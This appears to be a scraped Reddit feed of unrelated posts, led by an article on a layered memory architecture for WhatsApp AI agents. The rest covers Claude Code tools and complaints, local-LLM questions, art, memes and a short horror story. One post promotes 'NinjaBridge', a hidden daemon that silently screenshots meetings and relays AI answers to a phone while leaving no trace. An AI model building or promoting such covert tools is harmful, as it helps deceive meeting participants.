If you're building AI agents that talk to people on WhatsApp, you've probably thought about memory. How does your agent remember what happened three days ago? How does it know the customer already rejected your offer? How does it avoid asking the same question twice?

The default answer in 2024 was RAG (Retrieval-Augmented Generation): embed your messages, throw them in a vector database, and retrieve the relevant ones before generating a response.

We tried that. It doesn't work for conversations.

Instead, we designed a three-layer system. Each layer serves a different purpose, and together they give an AI agent complete conversational awareness.


┌─────────────────────────────────────────────────┐
│ Layer 3: CONVERSATION STATE                     │
│ Structured truth. LLM-extracted.                │
│ Intent, sentiment, objections, commitments      │
│ Updated async after each message batch          │
├─────────────────────────────────────────────────┤
│ Layer 2: ATOMIC MEMORIES                        │
│ Facts extracted from conversation windows       │
│ Embedded, tagged, bi-temporally timestamped     │
│ Linked back to source chunk for detail          │
│ ADD / UPDATE / DELETE / NOOP lifecycle          │
├─────────────────────────────────────────────────┤
│ Layer 1: CONVERSATION CHUNKS                    │
│ 3-6 message windows, overlapping                │
│ NOT embedded - these are source material        │
│ Retrieved by reference when detail is needed    │
├─────────────────────────────────────────────────┤
│ Layer 0: RAW MESSAGES                           │
│ Source of truth, immutable                      │
└─────────────────────────────────────────────────┘

Layer 0: Raw Messages

Your message store. Every message with full metadata: sender, timestamp, type, read status. This is the immutable source of truth. No intelligence here, just data.

Layer 1: Conversation Chunks

Groups of 3-6 messages, overlapping, with timestamps and participant info. These capture the narrative flow - the mini-stories within a conversation. When an agent needs to understand how a negotiation unfolded (not just what was decided), it reads the relevant chunks.

Crucially, chunks are not embedded. They exist as source material that memories link back to. This keeps your vector index clean and focused.
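As a rough sketch of the windowing described above (the window size and overlap below are illustrative defaults, not the authors' exact parameters):

```python
def chunk_messages(messages, size=4, overlap=1):
    """Split a message list into overlapping windows (Layer 1).

    `size` and `overlap` are hypothetical knobs; the post describes
    3-6 message windows with some overlap between neighbors.
    """
    step = size - overlap
    # Start a new window every `step` messages so consecutive
    # windows share `overlap` messages of context.
    return [messages[i:i + size] for i in range(0, len(messages), step)
            if messages[i:i + size]]
```

The shared tail between windows is what preserves narrative continuity when a single exchange spans a window boundary.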

Layer 2: Atomic Memories

This is the search layer. Each memory is a single, self-contained fact extracted from a conversation chunk:

  • Facts: "Customer owns a flower shop in Palermo"
  • Preferences: "Prefers WhatsApp over email for communication"
  • Objections: "Said $800 is too expensive, budget is ~$500"
  • Commitments: "We promised to send a revised proposal by Monday"
  • Events: "Customer was referred by Juan on March 28"

Each memory is embedded for vector search, tagged for filtering, and linked to its source chunk for when you need the full context. Memories follow the ADD/UPDATE/DELETE/NOOP lifecycle - no duplicates, no stale facts.

Memories exist at three scopes: conversation-level (facts about this specific contact), number-level (business context shared across all conversations on a WhatsApp line), and user-level (knowledge that spans all numbers).

Layer 3: Conversation State

The structured truth about where a conversation stands right now. Updated asynchronously after each message batch by an LLM that reads the recent messages and extracts:

  • Intent: What is this conversation about? (pricing inquiry, support, onboarding)
  • Sentiment: How does the contact feel? (positive, neutral, frustrated)
  • Status: Where are we? (negotiating, waiting for response, closed)
  • Objections: What has the contact pushed back on?
  • Commitments: What has been promised, by whom, and by when?
  • Decision history: Key yes/no moments and what triggered them

This is the first thing an agent reads when stepping into a conversation. No searching, no retrieval - just a single row with the current truth.
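A minimal sketch of the read path the layers imply - state first, then memory search, then chunk lookup by reference. Everything here (the class, the dict storage, tag-based matching instead of vectors) is a hypothetical stand-in for whatever databases back each layer:

```python
class MemoryStore:
    """Toy stand-in for the four layers; a real system would use a DB."""

    def __init__(self):
        self.state = {}     # Layer 3: conversation_id -> structured state row
        self.memories = []  # Layer 2: dicts with text, tags, chunk_id, conversation_id
        self.chunks = {}    # Layer 1: chunk_id -> list of raw messages (Layer 0)

    def context_for(self, conv_id, query_tags):
        # 1. State is read directly: one row, no search.
        state = self.state.get(conv_id, {})
        # 2. Atomic memories are searched (tag match here; vectors in reality).
        hits = [m for m in self.memories
                if m["conversation_id"] == conv_id and query_tags & set(m["tags"])]
        # 3. Source chunks are fetched by reference only when detail is needed.
        detail = {m["chunk_id"]: self.chunks[m["chunk_id"]] for m in hits}
        return {"state": state, "memories": hits, "chunks": detail}
```

The ordering is the point: the cheap, always-correct Layer 3 read happens before any retrieval is attempted.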

r/Adulting Mdy1326

ACTIVE AND EMPATHETIC LISTENING, NO JUDGMENT, JUST A SAFE SPACE🫂

I support people who are mentally overloaded in sorting out what they feel, lowering their anxiety, and making clearer decisions.

It's not therapy; it's a practical space for clarity and release.

Sessions by chat or audio.🙌🏾

r/ClaudeAI BornBroccoli8267

I tracked my Claude Code CO2 emissions for 4 months - here's what I found (+ open source tool)

Built a small tool to measure the carbon footprint of Claude Code sessions. After running it across 367 sessions over 4 months, I'm at 215 kg CO2e - projecting to about 1 tonne/year.

For context: roughly a one-way Paris-New York flight, per year, just from AI coding.

The tool adds a live CO2 counter to the Claude Code status line, stores everything in a local SQLite DB, and can backfill your existing session history from the JSONL transcripts in ~/.claude.

Install:

git clone https://github.com/gwittebolle/claude-carbon.git ~/code/claude-carbon
bash ~/code/claude-carbon/scripts/setup.sh

Then add two lines to your ~/.claude/settings.json - one for the status line, one for the Stop hook. Full instructions in the README.

Caveats: these are estimates, not precise measurements. Anthropic doesn't publish per-model energy data, so the factors are derived from a 2025 academic study on LLM inference energy (Jegham et al.). Good enough for order-of-magnitude awareness, not for carbon accounting.
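The general shape of such an estimate is tokens × energy per token × grid carbon intensity. The factors below are made-up placeholders for illustration, not the ones claude-carbon actually uses:

```python
def estimate_co2_grams(tokens: int,
                       wh_per_1k_tokens: float = 3.0,      # placeholder, not measured
                       grid_g_co2_per_kwh: float = 400.0   # placeholder grid intensity
                       ) -> float:
    """Order-of-magnitude CO2e estimate (grams) for LLM token usage."""
    kwh = tokens / 1000 * wh_per_1k_tokens / 1000  # Wh -> kWh
    return kwh * grid_g_co2_per_kwh
```

With these placeholder factors, a million tokens comes out to about 1.2 kg CO2e, which shows why the author frames the tool as awareness rather than accounting: both factors carry large uncertainty.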

MIT license, pure bash, works on macOS out of the box.

GitHub: https://github.com/gwittebolle/claude-carbon

r/Anthropic ehvyn

Claude Credit Disappeared?

Hi all,

Anyone else experience the issue where you claimed the credit from Anthropic, showed in your balance and now it's disappeared from your balance?

No option to 're-redeem' it. I tried using Help, but it directs me to the Fin AI bot, which points me to the help article and then closes the chat conversation.

Surely I can't be the only one..

r/ARAM AtWorkJZ

Dropkick on Urgot wasn't working?

I just had dropkick on Urgot and it didn't proc once. I had no execute indicators. I could get kills normally, just wouldn't execute them at all. Kind of a waste of a prismatic augment. Anyone else have issues with this?

r/painting ComfortableCupcake42

Fingerprints of the Gods, Samuel Ludke

r/midjourney PrestigiousMonitor92

Disco 4000

Style Creator works hard: A mesmerizing female dancer at the center of a dark cyberpunk dance floor, alluring and mysterious expression, eyes half-closed, lost in the music, graceful movement frozen in time, dark dress with subtle deep crimson and violet bioluminescent details, long dark hair swept by motion blur, the dance floor around her wet and reflective, mirroring her silhouette, other dancers blurred and out of focus in the background, crimson and violet neon light beams cutting through heavy smoke, light falls only on her everything else consumed by darkness, she is the only thing in focus, magnetic and unreachable, Blade Runner dystopia meets Makoto Shinkai luminous intimacy, extreme shallow depth of field, cinematic close-medium shot, dramatic rim lighting, volumetric smoke, ultra-detailed

r/ClaudeCode WonderfulSet6609

Opus seems incredibly dangerous because of its carelessness

I use the Obra/Superpowers plugin in Claude Code. Once, after a plan review had finished, I asked it to run the review again... and the second run, just like the first, found errors.

Now I’m running the review for the third or fourth time, and it keeps finding critical and important errors in the plan... I dread to think that this could go on forever and that Opus 4.6 will never be able to write a correct plan... I’m going crazy.

r/Art ComfortableCupcake42

Fingerprints of the Gods, Samuel Ludke, Digital Abstract, 2026

r/LocalLLM Friendly-Albatross-3

Buying used: X399 Aorus Xtreme + 1950X + AX1600i, Advice needed

Specs:

CPU: Threadripper 1950X (16 cores)

MB: Gigabyte X399 Aorus Xtreme

RAM: 64GB DDR4, quad channel

GPU: RTX 4070 12GB

PSU: Corsair AX1600i (1600W Titanium)

Cooler: Corsair 240mm AIO (8 years old)

Case: Lian Li D600

I just saw this used listing and I'm wondering if it's a smart buy for 1200€. I plan to add a second GPU (RTX 3090) and run 30B models on this.

Any red flags I should look for with this specific hardware?

r/mildlyinteresting harshalone

A residential London street lined with blooming cherry blossom trees

r/LocalLLM BirdSwimming7462

LLMs for non-english?

I'm still early in my local llm journey, I've set up a few and tried to get roleplay to function somewhat smoothly. Work in progress.

But curious if anyone has suggestions for widely available models for multilingual conversations? Specifically, spanish and dutch are my targets.

I have a Llama 3 variant running which seems to do *ok* in Spanish, but its grammar is kinda funky. Wondering if there are models better suited to this.

r/SipsTea Ok_Future6226

Redditors when there's an AI image/video

r/AI_Agents AdVirtual2648

This open-source Claude Code setup is actually insane

so someone just open sourced the most complete claude code setup i've ever seen and it's genuinely ridiculous

27 agents. 64 skills. 33 commands. all pre-configured and ready to go. we're talking planning, code review, fixes, tdd, token optimization... basically everything you'd spend weeks setting up yourself already done for you

the wildest part is it comes with something called agentshield built in. 1,282 security tests baked right into the config. so you're not just getting productivity... you're getting guardrails too

and it's not locked to one tool either. works on cursor, opencode, codex cli. one repo and you're set up everywhere

the whole thing is free and open source.

Link is mentioned in the comments.

r/Art ben_watson_jr

That Girl, Steven Butler, oil Painting, 2008

r/blackmagicfuckery Serious-Ad-8168

Classic Chip Trick. Luck or Skill?

the answer is skill, by the way.

heres some early debunking:

the queen of hearts is genuinely chosen at random; the deck is not modified whatsoever; no magnets involved either lol

r/TwoSentenceHorror 54321RUN

I was told that I should never try to contact the devil or he would come to my house and take me.

But I ring my dad anyway, and now I'm locked in the trunk of his car with a shovel heading towards the forest.

r/metaldetecting KechanicalMeyboard

What is this thing? Has a twisted appearance and holes on either side. Found on the beach in BC.

The detector only blips slightly for it, with no number. The pinpointer goes off a little bit for it. I found it while trying to pinpoint something else.

r/Wellthatsucks Chloe__maddi

My dog hit my coffee cup with her tail!

r/LiveFromNewYork MarvelsGrantMan136

Chili's Waitress - SNL (Cut for Time Sketch)

r/homeassistant TheProffalken

Decided to jump on the "cheap yellow display" bandwagon and build a frame for it

ok, so the woodworking isn't excellent, but it's my first attempt at a mitred frame with rounded edges and I'm pretty pleased with the results!

the "blob" to the bottom left is actually some hot glue covering the rgb led - I'm hoping that by the time I've oiled the pine up you won't be able to see much of a difference!

r/Art OtherwiseCut3112

The Lovers (Biological Study after Magritte), KUGUTSU, Avian Dermis, 2025 [OC]

r/BrandNewSentence uppsak

An infant (unemployed)

r/TheWayWeWere angrylittlemonster

Mom's 1965 High School Graduation Hair

Bouffant flip in full force.

r/leagueoflegends AutoModerator

LEC 2026 Spring Split / Week 2 - Day 3 / Live Discussion

LEC 2026 Spring

Lolesports | Leaguepedia | Eventvods.com | New to LoL

Today's matches will be played on Patch 26.07.

Today's Matches

#  Match        PST    EST    CET    KST
1  GX vs TH     08:00  11:00  17:00  00:00
2  VIT vs MKOI  11:15  13:15  19:15  02:15
  • All matches are Best of 3

Streams


Standings:

#   Team           Region  Record (Game Score)
1   GIANTX         EMEA    2 - 0 (4 - 1)
2   Team Vitality  EMEA    2 - 1 (5 - 2)
3   Natus Vincere  EMEA    2 - 1 (4 - 4)
4   Karmine Corp   EMEA    1 - 0 (2 - 1)
5   G2 Esports     EMEA    1 - 1 (3 - 2)
5   Movistar KOI   EMEA    1 - 1 (3 - 2)
7   Fnatic         EMEA    1 - 2 (3 - 5)
8   Team Heretics  EMEA    1 - 2 (2 - 5)
9   Shifters       EMEA    0 - 1 (0 - 2)
10  SK Gaming      EMEA    1 - 3 (4 - 6)

On-Air Team

Hosts: Eefje "Sjokz" Depoortere, Laure "Laure" Valée
Play-by-Play Commentators: Daniel "Drakos" Drakos, Aaron "Medic" Chamberlain, Jake "Hysterics" Osypenko
Colour Casters: Andrew "Vedius" Day, Robert "Dagda" Price
Guests: Andrei "Odoamne" Pascu, Finn "Finn" Wiestål, Jakob "Jackspektra" Gullvag Kepple

Not all talent will appear on every show and the weekly on air team can vary.


Format

  • Spring Season

    • Ten teams
    • Single round robin
    • Matches are best of three
    • Top 6 teams qualify for Playoffs
  • Playoffs

    • 6 teams participate
    • Double elimination bracket
    • Top 4 teams start in upper bracket
    • Bottom 2 teams start in the lower bracket
    • All matches are best of five
    • Top 2 teams qualify for the 2026 Mid-Season Invitational
    • Champion qualifies for the Esports World Cup 2026

The official LEC ruleset can be found here.


VoDs


Live Discussions and Post-Match Threads:

This is our Live Discussion Archive. Here you can find all the old live threads, and the respective PMTs in a stickied comment under the post.

r/Anthropic MrRoBoT696969

Think guys think

  1. Anthropic denied the Pentagon,
  2. lost defence contract,
  3. lost lawsuit,
  4. source code leak,
  5. performance issues and outright mockery online.

coincidence?

r/creepypasta shortstory1

Roden why did you say hi to me!

Roden the way you said hi to me the other day, it was different. The words sound like every other hi and greeting that you get on a normal basis. The way you said hi to me roden that day, it looked like a normal casual respectful hi, but it was the king of all hi's. I don't know why you would give a hi to me that was the king of all hi's and I am grateful but extremely annoyed. This hi come with a lot of responsibility and pressure. Like you said hi to me just like any other day, but this one was different.

You were wearing the same casual clothes and it wasn't a special day at all. You might have said hi that was the king of all hi's by accident. Everyone is wary of giving away the royalty of certain common greetings and mutual respect. I know someone who was given the king of goodbyes when his friend said good bye to him. So now I have this thing now on my shoulder. When I tried to leave the gym by cutting off the subscription, the gym owner wouldn't cut the subscription off. I tried contacting the bank about it, but even they don't want to stop.

So now I'm stuck with this gym, because the owner says it's due to my receiving the king of all hi's. I don't want to go to this toxic gym anymore, so I tried giving away the king of all hi's by saying hi to other people. It didn't work; no one really knows how to pass these on, and it kind of happens by accident. Then, when my co-worker said goodbye to me as I took over the shift, I had now received the queen of all goodbyes. You can just feel it.

So now I had the king of hi's and the queen of goodbyes on me. Then someone gave me the prince of smiles and the princess of shaking hands. I had a whole royal family of greetings and pleasantries. I was fighting with the gym owner to cut my subscription, and my bank wouldn't do it. No restaurant or takeaway would serve me apart from a restaurant called Diggies. They would never let me pay the bill; they would just add it on.

Then one day I was kidnapped and brought to the gym, and they threatened the king of hi's, the queen of goodbyes, the prince of smiles and the princess of shaking hands. They told me I would die unless gold was found in the gym.

The next day the gold was found inside the gym and I was let go. I still have the royalties of greeting and pleasantries in me and I'm not safe.

r/Unexpected Electrical-Office-84

Accident

r/ProductHunters AlistairGreenwood

Product Hunt upvotes not working/ How do you get upvotes?

Hi All,

I uploaded my product RankAgent on Product Hunt and shared it with friends and colleagues, but when they click upvote nothing changes, almost like it doesn't get registered?

Has anyone else experienced this and does anyone know how to get upvotes generally?

Maybe I configured it wrong? The project is https://www.producthunt.com/products/rankagent?

Any tips would be really helpful!

r/Art herowninspiration

Pregnant tummy sculpture, herowninspiration, wood, 2025

r/comfyui Gaurox

Right-click any ComfyUI image/video → extract prompt, seed, workflow instantly

I made a small tool to inspect AI-generated files locally.

Right-click any PNG or MP4 → extract:

- prompt

- seed

- models

- full workflow

Works with ComfyUI + A1111-style metadata

Also supports video workflows

Built this because I was tired of having to go back and find my prompts all the time 🙂

https://github.com/Gaurox/AI-Metadata-Inspector
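ComfyUI and A1111-style tools store generation parameters in PNG tEXt chunks, so the core of such an extractor can be sketched with nothing but the standard library (this is an independent illustration, not code from the linked repo):

```python
import struct

def extract_png_text_chunks(data: bytes) -> dict:
    """Walk PNG chunks and collect tEXt key/value pairs - the chunks
    where ComfyUI stores its workflow JSON and A1111 its parameters."""
    assert data[:8] == b'\x89PNG\r\n\x1a\n', "not a PNG"
    pos, out = 8, {}
    while pos + 8 <= len(data):
        length, ctype = struct.unpack('>I4s', data[pos:pos + 8])
        if ctype == b'tEXt':
            # tEXt payload is keyword, NUL separator, then the text value.
            key, _, val = data[pos + 8:pos + 8 + length].partition(b'\x00')
            out[key.decode('latin-1')] = val.decode('latin-1')
        pos += 12 + length  # 4 (length) + 4 (type) + data + 4 (CRC)
    return out
```

In a ComfyUI export you would typically look up the `prompt` or `workflow` key and parse the value as JSON.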

r/AI_Agents Sachin_Sharma02

Zero-infra AI agent memory using Markdown and SQLite (Open-Source Python Library)

I built memweave because I was tired of AI agent memory being a "black box." When an agent makes a mistake, debugging a hidden vector database or a cloud service is a chore. I wanted a system where the "Source of Truth" is just a folder of Markdown files I can open in VS Code, grep through, or git diff to see exactly what the agent learned during a session.

How it works technically: The library separates storage from indexing. Your .md files are the ground truth; a local SQLite database acts as a disposable, high-speed cache.

Hybrid Search: It runs sqlite-vec (semantic similarity) and FTS5 (BM25 keyword matching) in parallel. It merges the scores (0.7 vector / 0.3 keyword) to ensure that specific technical terms—like "PostgreSQL JSONB" or "Error 404"—surface even when vector embeddings are fuzzy.
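The weighted merge described above can be sketched like this, assuming both searches return id-to-normalized-score maps (the exact normalization memweave uses may differ):

```python
def merge_scores(vector_hits: dict, keyword_hits: dict,
                 w_vec: float = 0.7, w_kw: float = 0.3) -> dict:
    """Blend semantic and BM25 scores. A document found by only one
    search still surfaces, just with a lower combined score."""
    ids = set(vector_hits) | set(keyword_hits)
    return {i: w_vec * vector_hits.get(i, 0.0) + w_kw * keyword_hits.get(i, 0.0)
            for i in ids}
```

Because missing scores default to zero, an exact keyword hit like "Error 404" ranks even when its embedding neighborhood is fuzzy, which is the failure mode the hybrid design targets.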

Temporal Decay: For dated files (like 2026-04-05.md), it applies an exponential decay to the relevance score. Older memories naturally "fade" to reduce noise, while "evergreen" files (like architecture.md) are exempt and stay at full rank.
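An exponential decay of the kind described might look like this; the 30-day half-life is a hypothetical knob, since the post doesn't state memweave's actual constant:

```python
import math
from datetime import date

def decayed_score(score: float, file_date: date, today: date,
                  half_life_days: float = 30.0, evergreen: bool = False) -> float:
    """Halve relevance every `half_life_days`; evergreen files are exempt
    and keep their full rank regardless of age."""
    if evergreen:
        return score
    age_days = (today - file_date).days
    return score * math.pow(0.5, age_days / half_life_days)
```

So a month-old daily note scores half of what it would fresh, while `architecture.md` flagged as evergreen never fades.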

Extraction via flush(): Instead of logging every word, you can pass a conversation to mem.flush(). It uses a focused LLM prompt to distill only durable facts (decisions, preferences) into your Markdown files.

Zero Infrastructure: No Docker, no external vector DB, no API setup. It uses LiteLLM for provider-agnostic embeddings and caches them by content hash to save on costs.
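Caching embeddings by content hash is straightforward to sketch (a hypothetical illustration, not memweave's code):

```python
import hashlib

def embedding_cache_key(text: str, model: str) -> str:
    """Same text + same model -> same key, so re-indexing unchanged
    Markdown files never re-calls the embedding API."""
    # NUL separator prevents collisions between (model, text) boundaries.
    return hashlib.sha256(f"{model}\x00{text}".encode("utf-8")).hexdigest()
```

Keying on the model name as well as the content means switching embedding providers via LiteLLM invalidates the cache cleanly instead of mixing incompatible vectors.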

It’s async-first and designed to be "pluggable"—you can swap in custom search strategies or post-processors easily. I’ve included a "Meeting Notes Assistant" example in the repo that shows the full RAG loop.

I’m curious to hear the community's thoughts on the "Markdown-as-source-of-truth" approach for local-first agents!

r/TwoSentenceHorror Outside_Normal

At first I thought it was just my depression that made the colours vanish.

It wasn't until the blood came out in greyscale that I knew something was wrong.

r/LocalLLM One_Commission5601

Landauer Heat Death, Old 97, and the Soft Fluttering Wings of Hope

I’ve written an essay on the nature of synthetic intelligence, a brief list of the problems, and not being a whiner, I come offering solutions to get Old 97 around the bend without going into the ravine. Central to the argument is Landauer Heat Death, Taxes, and the Golden Rule, of all things. Yes, we make it around the bend but it doesn’t solve the long term problems Hinton is pointing out, and you’d think we’d already know. Buck up, the human race didn’t just fall off a turnip truck. At the bottom of Pandora’s Box, as promised, is the solution to Fermi’s Paradox, the soft fluttering sound of the wings of Hope.

It’s written so a retired EE, or an MD, or a bricklayer could follow it well enough if interested.

https://syntheticintelligencemorality.substack.com/p/landauer-heat-death-old-97-and-the

r/aivideo Its_Enrico_PaIazzo

Ride or Die '26 Bonnie and Clyde

r/LiveFromNewYork spellboi_3048

If I had a nickel for every time a man named Domingo became heavily associated with a Sabrina Carpenter song, I’d have two nickels.

r/AskMen foreverand2025

What’s a good moisturizer I can get for my face at target/walmart/etc that doesn’t smell girly? My skin gets really dry.

Basically the title.

r/findareddit Chobikil

I want to ask people what they think about abused children taking revenge on their abusive parents in passive ways.

Does r/SeriousConversation work? If not, please share suggestions.

And please don't comment on the question.

r/ClaudeAI LlurkingLlama23

Fiction writing Issue

How do I get Sonnet 4.6 to stop using run-on sentences? (Multiple uses of 'and' in one sentence.) Asking it to "please avoid multiple uses of 'and' within a single sentence" doesn't work.

r/PhotoshopRequest southernchristiangal

Head rotation adjustment

Hi there! Is anybody able to take the third picture in the bathing suit, and adjust my head so I'm looking to the side, I like my side profile much more than just head on. It would be greatly appreciated, thank you!

r/SideProject Long-Entertainer-323

An AI "Ghost Bridge" that gets answers to questions onto your phone without leaving a trace on your PC

So basically, when you're in a meeting sharing your screen and someone asks you a question, you can't just open up an AI and ask it on your laptop, and taking out your phone to ask takes a lot of time.

So I coded NinjaBridge

It’s a background daemon that lives in your RAM. It captures your screen context silently, sends it to an AI, and pings the answer to your phone via telegram/discord.

Why it’s cool:

  • The "Vanish" Mode: Once you click "Go Stealth," the app disappears from the taskbar. It’s basically digital smoke
  • No Paper Trail: It doesn't save screenshots to your disk. Your gallery stays clean; your secrets stay secret
  • BYOK: Use your own API keys so I don't see your data (and you don't pay me for tokens)

Check the repo: https://github.com/MrWatt369/ninjabridge

Any improvements or issues, comment them down below.

r/ClaudeCode hirokiyn

We built a simple way to reuse context across agents, threads, and tools

r/Wellthatsucks Immediate-Meaning457

In Japan, there are restaurants that only Japanese people are allowed to enter

Tourists (who took this video) could not enter this restaurant because they are not Japanese people.

r/ChatGPT Maximum_Trifle_3700

Here's GPT Image Gen 2 handling 10+ constraints in one shot! Including speech bubbles and mood cues

Difficulty level:

Engineer workflow: 7/10

Difficulty Sections:

· "unsymmetrical triangle panel" → layout instruction

· "POV human, find manga refs" → camera direction

· "vibe of shift a little = whole different world" → mood/atmosphere cue

· "legs kinda dangling" → pose micro-detail

Visual direction language that’s already internalized from comic-making & worldbuilding habits.

Advanced Prompt in human language:

Generate a comic using 2 characters from our worldbuilding history:

Male character (Starion), Female character (Murasaki)

P.S: I made my worldbuilding (lore only) in a JSON file. 'Cause it's been a massive log for 3 years lol. And my GPT logs are a mess—from worldbuilding to debugging. So I picked out only the worldbuilding stuff and compacted it into JSON, and GPT uses it as character references.

Prompt:

First panel: Murasaki sitting alone on a rooftop, looking at the city view. Use the image I gave you but tweak it—don’t change too much.

Then Starion’s face shows up—calm expression, unsymmetrical triangle panel. First triangle panel focuses on his face, second triangle panel highlights his hand holding cookies & tea, third triangle panel shows him closing his eyes with a relieved smile, small speech bubble saying “hmm.”

Small square panel, top left (panel 4): Starion walks toward Murasaki, seen from behind (POV human—find manga refs if you can).

Bottom square panel: He’s next to Murasaki. She’s smiling. They’re both looking at each other, camera facing them from the front. Both sitting chill, legs kinda dangling—but give off the vibe that shifting a little would transport you to another world. No dialogue, just expressions of mutual relief.

Last panel:

They smile at each other with a single speech bubble:

Murasaki: No bugs

Starion: Yeah, no bugs

Use panel layout like my example, but adjust it. Starion and Murasaki are in casual outfits, btw.

Why is GPT Image Gen 2 a monster?

GPT Image Gen 2 in 5.3 can hold all these constraints at once in a single shot:

✅ Character consistency across multiple panels

✅ Same outfit details (like “5.4” hoodie) consistent

✅ Same face across angles & expressions

✅ Panel layout / comic structure

✅ Cohesive night cityscape background

✅ Clean speech bubbles

✅ Consistent lighting mood

That’s… insane lol 😭 Back in the day this needed a long ComfyUI workflow + LoRA training + manual compositing—and still broke half the time.

Back then, the bottleneck for image gen was multi-constraint degradation—the more constraints, the more it broke. Now if Image Gen 2 can handle comic panel consistency + character + layout + text all in one shot…

That means the “you need LoRA + ComfyUI workflow for serious stuff” paradigm is starting to get obsolete ? 🤯

What used to take:

· LoRA training

· Iterative inpainting

· Manual compositing

· Post-edit in Photoshop

Now it’s just… proper prompting 💀

IMAGE GEN 2 IS A TOTAL MONSTER.

r/StableDiffusion Starkaiser

Hi. is there any hair swap tool?

I see face swap tools, which are usually paid browser things. And I've noticed there's a Flux model for head swap, but it swaps the whole head with no skin-color correction when the people have different skin tones (it also has a head-resize issue).

Other than that, I'm curious whether a hair swap tool exists, since it's very difficult to prompt the exact hair structure of a realistic hairstyle from one model to another.

If anybody knows, thank you!!

r/SideProject justiceman111

I built a local AI that controls my Mac (no setup but needs 16 GB RAM) — open source & looking for collaborators

I got tired of the copy-paste loop with ChatGPT, so I built a voice-first AI that runs entirely on my Mac and actually executes tasks instead of just chatting.

It can:

• read/reply to emails and send iMessages through native apps

• find, move, rename, and organize files

• read the screen (OCR) and click/scroll

• create docs / PDFs / presentations by voice

• run background agents (e.g. “research X and write a report”)

• run scheduled tasks (like “summarize my inbox every morning”)

• connect to tools like Notion, GitHub, Figma, etc

• index folders into a local knowledge base for voice search

Around 40 tools wired directly into macOS.

Under the hood: Local model (Qwen 4B via llama.cpp), Whisper for voice, wake word detection, SQLite.

Electron app — no Python, no setup headache.

Everything runs locally: No accounts, no telemetry. You can disconnect WiFi and it still works the same.

Setup is simple: Download, grant permissions, say “computer.”

Caveats: – needs ~16GB RAM

– macOS only for now

– small model, so not GPT-4 level writing

– voice misfires sometimes

– some flows are still slower than doing things manually

It’s fully open source (MIT), no paid tier.

I’m mainly trying to figure out: Would you actually use something like this? What would make it genuinely useful in your workflow?

https://www.vox-ai.chat/

r/Adulting Technical-Vanilla-47

What is a college experience you will never forget?

r/KlingAI_Videos Floor207

All of a sudden the website turns into chinese

Anyone have a clue how to fix this? The site has suddenly switched to Chinese for me.

r/Adulting junglejasmine

😩😩no I’m not winning

r/CryptoCurrency hoppeeness

Hedera and the Bank of England | Why Hedera Keeps Appearing

r/SideProject dans_face_

My parking app is live, but now I’m trying to map every individual spot, but failing. Help?

Hey r/SideProject,

I’m a solo dev that’s built a parking app. My goal is to expand the build and map the individual street spots and specific bays in shopping centres which don’t exist on any map.

The app is built, and I have about 550 users. But I’ve only had 5 spots contributed by the community.

Right now, asking someone to "Map a Spot" feels like I’m asking them to do a homework assignment. I offer a 24-hour pass to see real-time parking spot availability for a user contribution of 3 spots, but clearly, that isn't cutting it.

I want to let you guys drive the next update. If you were going to help map the spots what would make it worth your while?

Some options I thought of:

• The "One-Tap" Drop: You park, hit one button, and the GPS drops a pin for that specific spot. I worry about the "rules" (2P, 4P, etc.) later.

• The Photo Snap: You just take a photo of the spot/sign, and I use AI to pull the location and rules so you don't have to type.

• The "Bounty" System: I put indicators on the map for unmapped streets. If you're the first to map a specific spot on that street, you get [X].

• The "Secret Club" Model: You can only see the "Community Spots" if you’ve contributed at least one yourself this month.

Imagine driving toward a busy shopping centre and seeing 3 green pins for the exact bays that are currently empty because someone just left. The goal is to make this app like Waze, but for parking.

What am I missing? Is it a "time" thing, a "reward" thing, or are we all just gatekeeping our favorite secret spots? Be brutal—I want to build the update that actually gets people involved.

Cheers

r/ChatGPT Brilliant-Abalone603

Is this how your ChatGPT responds?

r/ClaudeAI timetolearn291

How to connect memory across Projects?

I have several projects in Claude for different areas of my life and I have added context files in each of the individual projects. I keep a running tally of action items in each of those projects, and I have set up so that anytime I am in a project, it brings me the most current action item list in that project on the command "bring me up to speed".

For example, I have a personal finance project in which typing "bring me up to speed" makes Claude bring up the most current actions I need to take to optimize my finances. These actions are based on our prior conversations and are all specific to my situation. Similarly, I have a health project in which typing "bring me up to speed" results in Claude bringing up the most current actions we have discussed for improving my health.

I am trying to determine if there is a way that I can set it up so that I can type a command in one place and Claude brings up all my action items across all projects, including personal finance, health, etc.

I have tried to use regular chat, outside of projects, to bring up the consolidated list by asking it to read across projects, but it tells me "I cannot directly read the current memory/action item lists stored inside projects".

I am thinking perhaps Claude Skills might be useful in this situation, but I am not sure. I have never set up Claude Skills before. Anyone have any suggestions for me?

Thanks in advance!

r/SipsTea DazzlingJellyy

Hard to swallow pills

r/CryptoCurrency hoppeeness

HBAR Weekly Update - Hedera's Ready for the Quantum Threat

r/homeassistant lol_alex

Recommend a HA weather station please

So I read this super interesting post about a migraine prediction dashboard recently:

https://reddit.com/r/homeassistant/comments/1s7gsyn/i_built_a_migraine_risk_card_that_tracks_9/

My wife and son both suffer from migraines, and I agree with the OP of the linked post that they seem to coincide with weather changes.

Now it seems I could just get weather data from any online service and the migraine dashboard would work, but maybe it would suit the HA approach better to have my own weather station (and get more precise data too).

What weather stations do you guys have that work with HA, are you happy with them?

r/Art Rich_Pickle2929

New Orleans Courtyard, Robert Filbey, Oil on Panel, 1964 [OC]

r/SipsTea Unstoppable_X_Force

Accurate 😹👌

r/ClaudeAI TMF007

Options

I'm building an application using the Claude CLI with API credits, and I'm interested in switching to one of the Claude Max plans. I have already spent more on the Claude CLI than the plans cost. Has anyone tested both to see where you get more value? Or am I second-guessing myself, and should I have made the switch already?

r/SipsTea lowkeypixel

Wonderful view at the wonderful street

r/therewasanattempt No_Bus_474

to move car away from approaching fire

r/Adulting NoBunch3298

Why is adulthood so lonely?

I don’t really understand this. Growing up, I saw that my dad had a lot of friends. It seemed like adults in general used to have more friends than they do now. Before the pandemic I had a lot of friends. My friends had a lot of friends and were out doing stuff constantly. But now, they all don’t seem to really do anything anymore. I don’t really see anyone with friends or doing stuff with other people. I am a 26-year-old man; it’s not like I’m that old, but I don’t really want to just settle down and have kids already. I’m going to try more groups and meet more people, but it feels like everywhere I look, no one is really doing anything new or hanging out with new people. I just want some buds to hang out with. Any advice or help with this?

r/TheWayWeWere Beginning-Passion676

A Turkish wedding, 1920s

r/ClaudeCode musikguru6

Where are you learning about CC?

What are your go-to sources for learning how to use Claude Code? Tips and tricks, tutorials beyond basic usage, etc. Right now, I feel like I'm stumbling across random X accounts, but I figure there must be more structured, professional resources out there.

r/ClaudeAI BrightOpposite

MCP is great, but it doesn’t solve AI memory (am I missing something?)

